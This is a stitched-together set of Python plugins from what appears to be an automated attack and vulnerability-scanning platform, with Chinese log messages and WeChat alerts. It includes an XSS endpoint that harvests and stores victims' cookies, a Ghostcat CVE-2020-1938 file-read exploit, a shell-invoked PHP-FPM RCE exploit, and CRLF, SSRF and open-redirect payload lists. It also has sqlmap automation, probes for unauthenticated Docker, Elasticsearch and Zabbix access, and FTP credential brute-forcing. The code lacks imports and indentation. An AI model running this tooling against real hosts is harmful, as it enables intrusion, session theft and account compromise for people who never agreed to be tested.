def xss_prey(request):
if 'HTTP_X_FORWARDED_FOR' in request.META:
ip = request.META['HTTP_X_FORWARDED_FOR']
else:
try:
ip = request.META['REMOTE_ADDR']
except:
ip = '0.0.0.0'
ip = ip.replace("'", "\'")
domain = request.GET.get('domain', 'Unknown').replace("'", "\'")
user_agent = request.META.get('HTTP_USER_AGENT',
'Unknown').replace("'", "\'")
# method = requests.method.replace("'","\'")
full_path = request.get_full_path()
full_path = unquote(full_path)
logger.debug(full_path)
cookie = full_path
logger.info(cookie)
try:
XssPrey.objects.update_or_create(domain=domain,
user_agent=user_agent,
cookie=cookie,
ip=ip)
title = '发现XSS猎物'
content = domain
wechat.send_msg(title, content)
except Exception as e:
logger.critical(e)
return HttpResponse('{"status":"ok"}', content_type='application/json')
def start(**kwargs):
policy = kwargs['policy']
socket.setdefaulttimeout(2)
ports = Port.objects.filter(service_name__icontains='docker')
if not ports:
logger.debug("[%s] %s" % (plugin, '未匹配到扫描对象'))
for port in ports:
port_num = port.port_num
ip = port.asset.ip
logger.debug("[%s] [%s] %s" % (plugin, port.id, ip))
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port_num))
payload = "GET /containers/json HTTP/1.1\r\nHost: %s:%s\r\n\r\n" % (
ip, port_num)
s.send(payload.encode())
recv = s.recv(1024)
if b"HTTP/1.1 200 OK" in recv and b'Docker' in recv and b'Api-Version' in recv:
logger.info(
'%-30s%-30s' %
('[$$$]success, ', "[True], this host is vulnerable"))
desc = 'Docker未授权访问漏洞,获取到如下信息:\n' + str(recv)
Risk.objects.update_or_create(target=ip,
risk_type='docker未授权访问',
defaults={'desc': desc})
title = 'docker未授权访问'
content = desc
wechat.send_msg(title, content)
except Exception as e:
logger.error(e)
def start(**kwargs):
policy = kwargs['policy']
assets = kwargs['assets']
socket.setdefaulttimeout(2)
ports = Port.objects.filter(asset_id__in=assets, port_num=8009)
for port in ports:
port_num = port.port_num
ip = port.asset.ip
logger.debug("[%s] [%s] %s" % (plugin, port.id, ip))
try:
t = Tomcat(ip, port_num)
_, data = t.perform_request('/hissec{".jsp" if args.rce else ""}', attributes=[
{'name': 'req_attribute', 'value': ['javax.servlet.include.request_uri', '/']},
{'name': 'req_attribute', 'value': ['javax.servlet.include.path_info', '/WEB-INF/web.xml']},
{'name': 'req_attribute', 'value': ['javax.servlet.include.servlet_path', '/']},
])
logger.info('----------------------------')
res = ''.join([d.data.decode('utf_8') for d in data])
if "web-app" in res:
logger.info('%-30s%-30s' % ('[$$$]success, ', "[True], this host is vulnerable"))
desc = 'cve-2020-1938 漏洞,获取到如下信息:\n' + str(res)
Risk.objects.update_or_create(port=port, asset=port.asset, risk_type='cve-2020-1938', defaults={'desc': desc})
title = '发现cve-2020-1938漏洞'
content = desc
wechat.send_msg(title, content)
except Exception as e:
logger.error(e)
logger.info('-' * 75)
def start(**kwargs):
policy = kwargs['policy']
if policy == 'full':
ports = Port.objects.filter(port_num='9200')
else:
ports = Port.objects.exclude(scanned__icontains=plugin).filter(
port_num=9200)
if not ports:
logger.debug("[%s] %s" % (plugin, '未匹配到扫描对象'))
protocols = ['http', 'https']
for port in ports:
ip = port.asset.ip
for protocol in protocols:
try:
url = protocol + "://" + ip + ":" + str(
port.port_num) + "/_cat"
logger.debug("[%s] [%s] %s" % (plugin, port.id, url))
response = requests.get(url)
if "/_cat/master" in response.text:
logger.info('[$$$]success, 可以匿名访问')
Risk.objects.update_or_create(
target=url,
risk_type='elasticsearch匿名访问',
defaults={'desc': 'elasticsearch匿名访问, ' + url})
logger.info("[True], this host is vulnerable")
title = 'elasticsearch匿名访问'
content = url
wechat.send_msg(title, content)
except Exception as e:
logger.error(e)
update_scan_status(port, plugin)
def check(obj):
try:
url = obj.url
except:
url = obj.subdomain + '/'
if url_is_ip(url):
return
for payload in payloads:
_url = url + payload
logger.debug("[%s] [%s] %s" % (plugin, obj.id, _url))
headers = settings.HTTP_HEADERS
try:
res = requests.get(_url, headers=headers, timeout=10, verify=False, allow_redirects=False)
except Exception as e:
# logger.error(e)
res = None
if res:
try:
if 'dandh811' in res.headers.keys():
logger.info('[$$$] %s , 该域名存在漏洞' % _url)
Risk.objects.update_or_create(target=url, risk_type='CRLF注入', defaults={"desc": _url + '\n' + payload})
title = '发现HTTP头注入漏洞'
content = _url
wechat.send_msg(title, content)
except Exception as e:
logger.critical(e)
try:
headers["x-request-id"] = 'test' + payload
res = requests.get(url, headers=headers, timeout=10, verify=False, allow_redirects=False)
except Exception as e:
continue
try:
if 'dandh811' in res.headers.keys():
Risk.objects.update_or_create(target=url, risk_type='CRLF注入', defaults={"desc": _url + '\n' + payload})
logger.info('success, 该域名存在漏洞')
title = '发现HTTP头注入漏洞'
content = _url
wechat.send_msg(title, content)
except Exception as e:
logger.critical(e)
update_scan_status(obj, plugin)
def start(**kwargs):
webapps = kwargs['webapps']
policy = kwargs['policy']
if policy == 'increase':
webapps = webapps.exclude(scanned__icontains=plugin).order_by('-id')
if not webapps:
logger.debug("[%s] %s" % (plugin, '未匹配到扫描对象'))
denominator = len(webapps)
molecular = 0
for webapp in webapps:
subdomain = webapp.subdomain
molecular += 1
if not bool(re.search('[a-z]', subdomain.split(':')[1])):
continue
logger.info('-' * 75)
logger.debug("[%s] [%s] %s" % (plugin, webapp.id, subdomain))
# if not web_is_online(subdomain.replace('https://', '')):
# webapp.delete() # 判断web是否开启443,关闭则删除
# logger.info('[删除] ' + subdomain)
# continue
try:
a = HTTP_REQUEST_SMUGGLER(subdomain)
res = a.run()
if res:
logger.info(res)
Risk.objects.update_or_create(target=subdomain, risk_type='HTTP夹带攻击', defaults={'desc': res})
title = '发现漏洞'
content = "漏洞类型:" + plugin
wechat.send_msg(title, content)
except Exception as e:
logger.critical(e)
if molecular == denominator:
percent = 100.0
logger.warning('%s [%d/%d]'%(str(percent)+'%', molecular, denominator))
else:
percent = round(1.0 * molecular / denominator * 100, 2)
logger.warning('%s [%d/%d]'%(str(percent)+'%', molecular, denominator))
update_scan_status(webapp, 'smuggling')
def start(**kwargs):
policy = kwargs['policy']
if policy == 'full':
weburls = WebUrls.objects.filter(url__contains='?').order_by('-id')
else:
weburls = WebUrls.objects.filter(url__contains='?').exclude(
scanned__icontains=plugin).order_by('-id')
if not weburls:
logger.debug("[%s] %s" % (plugin, '未匹配到扫描对象'))
return
keywords = [
'share', 'wap', 'url', 'link', 'src', 'source', 'target', 'u', '3g',
'display', 'sourceURl', 'imageURL', 'domain'
]
for weburl in weburls:
for keyword in keywords:
_keyword = '?' + keyword + '='
if _keyword in weburl.url:
url = weburl.url.split(
_keyword)[0] + _keyword + 'http://127.0.0.1:22'
logger.debug("[%s] [%s] %s" % (plugin, weburl.id, url))
try:
res = requests.get(
url, timeout=10, verify=False,
allow_redirects=False).content.decode('utf-8')
if 'mismatch' in res:
logger.info(res)
logger.info('[$$$] success, 发现%s漏洞' % url)
Risk.objects.update_or_create(target=url,
risk_type=plugin,
defaults={'desc': url})
title = '发现%s漏洞' % plugin
content = '-'
wechat.send_msg(title, content)
update_scan_status(weburl, plugin)
except Exception as e:
logger.critical(e)
def start(**kwargs):
policy = kwargs['policy']
if policy == 'full':
weburls = WebUrls.objects.filter(url__contains='?').order_by('-id')
else:
weburls = WebUrls.objects.filter(url__contains='?').exclude(scanned__icontains='sqli').order_by('-id')
if not weburls:
logger.debug("[%s] %s" % (plugin, '未匹配到扫描对象'))
return
denominator = len(weburls)
molecular = 0
for weburl in weburls:
molecular += 1
url = weburl.url
logger.info('-' * 75)
logger.debug("[%s] [%s] %s" % (plugin, weburl.id, url))
data = sqlmap(url)
try:
if data:
logger.info(data)
logger.info('[$$$]success, 发现SQL注入漏洞')
Risk.objects.update_or_create(target=url, risk_type='SQL注入', defaults={'desc': data})
title = '发现SQL注入漏洞'
content = '-'
wechat.send_msg(title, content)
else:
logger.info('未发现漏洞')
update_scan_status(weburl, 'sqli')
except Exception as e:
logger.info('* %s' % e)
if molecular == denominator:
percent = 100.0
logger.info('进度: %s [%d/%d]' % (str(percent)+'%', molecular, denominator))
else:
percent = round(1.0 * molecular / denominator * 100, 2)
logger.info('进度 : %s [%d/%d]' % (str(percent)+'%', molecular, denominator))
def start(**kwargs):
policy = kwargs['policy']
webapps = kwargs['webapps']
if policy == 'increase':
webapps = webapps.filter(other_info__icontains='php/').exclude(
scanned__icontains=plugin)
else:
webapps = webapps.filter(other_info__icontains='php/')
if not webapps:
logger.debug("[%s] %s" % (plugin, '未匹配到扫描对象'))
for webapp in webapps:
url = webapp.subdomain
logger.debug("[%s] [%s] %s" % (plugin, webapp.id, url))
cmd = '/root/go/bin/phuip-fpizdam %s/index.php' % url
logger.info(cmd)
p = subprocess.Popen(cmd,
shell=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
out, err = p.communicate()
out = out.decode('utf-8')
logger.info(out)
logger.error(err.decode('utf-8'))
if 'success' in out:
Risk.objects.update_or_create(target=url,
risk_type='php漏洞',
defaults={'desc': cmd})
logger.info('[$$$]success')
title = '发现漏洞'
content = plugin
wechat.send_msg(title, content)
update_scan_status(webapp, plugin)
logger.info('-' * 75)
def start(**kwargs):
webapps = kwargs['webapps']
policy = kwargs['policy']
keywords = [
'next', 'url', 'return', 'redirect_url', 'callback_url', 'callback',
'r', 'target', 'error', 'errurl', 'error_url', 'redirect',
'redirect_to', 'jump', 'jump_to', 'to', 'link', 'linkto', 'domain',
'u', 'continue', 'back_url'
]
payloads = [
r'\baidu.com', '/baidu.com', '//baidu.com', '///baidu.com',
'////baidu.com', 'https://[email protected]', '#baidu.com',
'?baidu.com', r'\\baidu.com', '.baidu', '.baidu.com',
'///baidu.com//..', '////baidu.com//..', '/http://baidu.com'
]
chrome_options = Options()
chrome_options.add_argument('--no-sandbox')
chrome_options.add_argument('--headless')
chrome_options.add_argument('--disable-dev-shm-usage')
if policy == 'full':
weburls = WebUrls.objects.order_by('-id')
else:
weburls = WebUrls.objects.exclude(scanned__icontains=plugin)
webapps = webapps.exclude(scanned__icontains=plugin)
if not weburls:
logger.debug("[%s] %s" % (plugin, '未匹配到扫描对象'))
for weburl in weburls:
url = parse.unquote(weburl.url, 'utf-8')
if url_is_ip(url):
continue
logger.debug("[%s] [%s] %s" % (plugin, weburl.id, url))
try:
browser = webdriver.Chrome(
executable_path='/opt/tools/chromedriver',
chrome_options=chrome_options)
except Exception as e:
logger.critical(e)
continue
risk = False
parseResult = parse.urlparse(url)
param_dict = parse.parse_qs(parseResult.query)
for param in param_dict.keys():
if param not in keywords:
continue
if risk:
continue
for payload in payloads:
_url = url.replace(param + '=' + param_dict[param][0],
param + '=' + payload)
logger.debug("[%s] [%s] %s" % (plugin, weburl.id, url))
try:
browser.get(url)
cur_url = browser.current_url
browser.close()
except Exception as e:
continue
if 'www.baidu' in cur_url:
logger.info('[$$$] success, 发现漏洞')
Risk.objects.update_or_create(target=url,
risk_type='开放重定向',
defaults={"desc": _url})
title = '发现开放重定向漏洞'
content = '-'
wechat.send_msg(title, content)
risk = True
try:
subprocess.call('pkill chrome', shell=True)
except Exception as e:
logger.critical(e)
finally:
browser.quit()
update_scan_status(weburl, plugin)
if not webapps:
logger.debug("[%s] %s" % (plugin, 'There are no objects to scan'))
payloads2 = [
r'\baidu.com', '/baidu.com', '//baidu.com', '///baidu.com',
'////baidu.com', '#baidu.com', '?baidu.com', r'\\baidu.com',
'///baidu.com//..', '////baidu.com//..', '/http://baidu.com'
]
for webapp in webapps:
try:
browser = webdriver.Chrome(
executable_path='/opt/tools/chromedriver',
chrome_options=chrome_options)
except Exception as e:
logger.critical(e)
continue
risk = False
for payload in payloads2:
if risk:
continue
url = webapp.subdomain + payload
logger.debug("[%s] [%s] %s" % (plugin, webapp.id, url))
try:
browser.get(url)
cur_url = browser.current_url
browser.close()
except Exception as e:
cur_url = 'error'
if 'www.baidu' in cur_url:
logger.info('[$$$] success, 发现漏洞')
Risk.objects.update_or_create(target=url,
risk_type='开放重定向',
defaults={"desc": url})
title = '发现开放重定向漏洞'
content = url
wechat.send_msg(title, content)
risk = True
try:
update_scan_status(webapp, plugin)
subprocess.call('pkill chrome', shell=True)
except Exception as e:
logger.critical(e)
finally:
browser.quit()
def start(**kwargs):
policy = kwargs['policy']
if policy == 'full':
ports = Port.objects.filter(service_name__icontains=plugin)
else:
ports = Port.objects.filter(service_name__icontains=plugin).exclude(
scanned__icontains=plugin)
if not ports:
logger.debug("[%s] %s" % (plugin, '未匹配到扫描对象'))
has_risk = False
for port in ports:
ip = port.asset.ip
try:
logger.debug("[%s] [%s] %s" % (plugin, port.id, ip))
socket.setdefaulttimeout(10)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port.port_num))
s.send("success".encode('utf-8'))
result = s.recv(1024).decode('utf-8')
if "Environment" in result:
logger.info('+ Found Vul: \033[0;32m %s, %s\033[0m' %
(ip, str(port.port_num)))
# command = "redis-cli -h %s -p %s" % (ip, port.port_num)
# res = subprocess.Popen(command, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE,
# stderr=subprocess.PIPE)
# res.stdin.write(b'info \n')
# out, err = res.communicate()
# out = out.decode('utf-8')
# logger.info(out)
# desc = 'redis空口令,连接上redis后,执行了info命令,读取到如下信息:\n' + str(out)
desc = 'zabbix未授权访问'
Risk.objects.update_or_create(target=port.asset.ip,
risk_type='zabbix漏洞',
defaults={'desc': desc})
has_risk = True
# elif "Authentication" in result:
# for pass_ in passwords:
# s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# s.connect((ip, 6379))
# s.send(("AUTH %s\r\n" % pass_).encode('utf-8'))
# result = s.recv(1024).decode('utf-8')
# if '+OK' in result:
# Risk.objects.update_or_create(port=port, defaults={'asset': port.asset,
# 'risk_type': 'redis弱密码',
# 'desc': '弱密码 %s' % pass_
#
# })
# logger.info(ip + ':' + str(port.port_num) + ' 存在弱口令漏洞,密码:%s' % pass_)
# has_risk = True
except Exception as e:
logger.error(e)
if has_risk:
title = '风险提示'
content = "发现zookeeper漏洞"
wechat.send_msg(title, content)
logger.info('-' * 100)
def get_reports(result, webapp):
# 获取scan_id的扫描报告
"""
11111111-1111-1111-1111-111111111111 Developer
21111111-1111-1111-1111-111111111111 XML
11111111-1111-1111-1111-111111111119 OWASP Top 10 2013
11111111-1111-1111-1111-111111111112 Quick
"""
url = result['target']['address']
count = 0
while True:
time.sleep(10)
res = get_status(result)
if res == 'completed':
scan_id = result['scan_id']
target_id = result['target_id']
data = {"template_id": "11111111-1111-1111-1111-111111111111",
"source": {"list_type": "scans", "id_list": [scan_id]}}
try:
response = requests.post(host + "api/v1/reports", data=json.dumps(data), headers=api_header, timeout=30,
verify=False)
scan_result = response.headers
loc = scan_result['Location']
except Exception as e:
logger.info('* %s' % e)
sys.exit()
logger.info('+ %s 扫描完成,正在生成报告 ...' % (time.strftime("%H:%M:%S")))
while True:
time.sleep(3)
try:
response = requests.get(host.strip('/') + loc, headers=api_header, timeout=30, verify=False)
res = json.loads(response.content.decode('utf-8'))
if res['download']:
break
except Exception as e:
logger.info(e)
logger.info('+ %s 报告生成完毕,下载中 ...' % (time.strftime("%H:%M:%S", time.localtime(time.time()))))
try:
report_download_url = res['download'][0]
report_response = requests.get(host.strip('/') + report_download_url, headers=api_header, timeout=30, verify=False)
report_path_ = '/files/reports/' + scan_id + '.html'
logger.info('+ 报告存储路径: %s' % report_path_)
report_path = settings.BASE_DIR + report_path_
with open(report_path, 'wb') as f:
f.write(report_response.content)
except Exception as e:
logger.info('* %s' % e)
sys.exit()
webapp.report = report_path_
try:
response = requests.get(host + 'api/v1/vulnerabilities?q=severity:3', headers=api_header, timeout=30, verify=False)
res = json.loads(response.content.decode('utf-8'))
vul_names = []
ignore_vuls = ['nginx Integer Overflow']
for vul in res['vulnerabilities']:
if vul['target_id'] == target_id and vul['vt_name'] not in ignore_vuls:
vul_names.append(vul['vt_name'])
if vul_names:
for vul_name in vul_names:
logger.info('--- %s' % vul_name)
desc = '\n'.join(vul_names)
risk = Risk.objects.update_or_create(target=webapp.subdomain, risk_type='awvs扫描漏洞', defaults={'desc': desc})
webapp.risk = risk[0]
title = 'awvs扫描漏洞'
content = desc
wechat.send_msg(title, content)
else:
logger.info('+ 未发现高风险漏洞')
except Exception as e:
logger.info('* %s' % e)
webapp.save()
logger.info('+ %s 报告已保存' % (time.strftime("%H:%M:%S", time.localtime(time.time()))))
break
if res == 'aborted':
break
def start(**kwargs):
policy = kwargs['policy']
if policy == 'full':
ports = Port.objects.filter(service_name__icontains=plugin)
else:
ports = Port.objects.exclude(scanned__icontains=plugin).filter(
service_name__icontains=plugin)
if not ports:
logger.debug("[%s] %s" % (plugin, '未匹配到扫描对象'))
with open(settings.BASE_DIR + 'brute/usernames.txt', 'r') as f:
usernames = f.readlines()
with open(settings.BASE_DIR + 'brute/passwords.txt', 'r') as f:
passwords = f.readlines()
ftp = ftplib.FTP()
for port in ports:
ip = port.asset.ip
logger.debug("[%s] [%s] %s" % (plugin, port.id, ip))
try:
ftp.connect(ip, port.port_num, timeout=5)
logger.info('ftp端口可以连接')
except Exception as e:
logger.error(e)
port.delete()
logger.info('FTP端口连接失败,删除端口')
continue
try:
ftp.login('', '')
logger.info('[$$$] FTP登录成功!')
Risk.objects.update_or_create(target=ip,
risk_type='ftp匿名登录',
defaults={
'target': ip,
'desc': 'ftp匿名登录'
})
continue
except Exception as e:
logger.error(e)
for username in usernames:
username = username.strip()
for password in passwords:
password = password.strip()
try:
# logger.debug(username + ':' + password)
ftp.login(username, password)
logger.info('[$$$] FTP登录成功!')
logger.info('[$$$]success, %s:%s' % (username, password))
Risk.objects.update_or_create(
target=ip,
risk_type='ftp弱口令',
defaults={'desc': '%s:%s' % (username, password)})
title = 'ftp弱口令'
content = '-'
wechat.send_msg(title, content)
except Exception as e:
# logger.info(e)
pass
update_scan_status(port, plugin)
logger.info('-' * 75)